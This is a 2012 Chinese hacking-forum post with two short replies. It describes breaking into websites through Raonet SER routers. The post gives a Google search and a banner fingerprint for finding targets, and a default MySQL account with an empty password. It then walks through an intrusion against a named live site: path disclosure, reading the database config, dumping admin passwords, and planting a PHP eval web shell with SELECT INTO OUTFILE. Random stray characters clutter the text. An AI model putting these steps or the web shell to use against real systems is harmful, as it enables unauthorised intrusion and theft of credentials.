找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3076|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
; |0 M' Y6 Y7 l1 j+ C: k. g' R( h% k+ C8 ]4 L
1:google搜索'Raonet Subscriber Ethernet Router'1 I" u2 s- \7 s- C9 {; b- t  o
' p8 T6 O1 p7 T% W" X+ W
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
9 b, _. E4 W: M7 K! |6 w% p) z- v2 s0 I
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) B7 h- \$ M0 x4 w# J

/ u( ~8 C1 r. z8 E- E//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
  C+ a2 D  }$ o! i# v+ N
( z7 v+ i( m1 i1 b9 `/ V" ` 4 Y# T3 a) N! ~( d1 W% }/ ~8 r% K

- ?. n: d2 J6 P入侵步骤:' H, n0 d% C- ^4 k( Y8 w8 ~4 ~/ t
7 f5 e) [0 |& ]4 g3 f# ]
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 @3 H% ?) u' ]9 X9 n* s6 c$ |( }0 j' {% X/ q; @# W6 o
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc# F8 J1 |  q9 r6 R
3:得到密码后连接,查看GUI管理密码:; `+ W. g  `) |! \* h. m9 U
use ser_500
% B+ P& z* u" V6 hselect id,passwd from user;
1 q' V/ O: {* {# S: M7 k# `4:通过数据库写入webshell,执行命令:
+ C4 z  I1 _0 x( D' Duse mysql;) C  |0 K9 u$ s3 [, i  }1 O
create table ok(cmd TEXT);7 p/ F. C3 K9 N
insert into ok values("<?php @eval($_POST[cmd])?>");$ M6 P+ Y1 m4 [# O
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";) r+ y% \! ^  y2 p
drop table ok;6 B) P! n( n7 K, ~/ K3 |6 c

7 e& [8 _5 o6 x3 o5:连接后门shell.php
$ ]# X. o) K! ~% @0 u) t& J  c- L8 o6 [0 [
6. 搞定!1 y- k# f9 G- |" H0 A

' p: Q' \2 _; _4 m5 E8 `' A9 i8 q
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表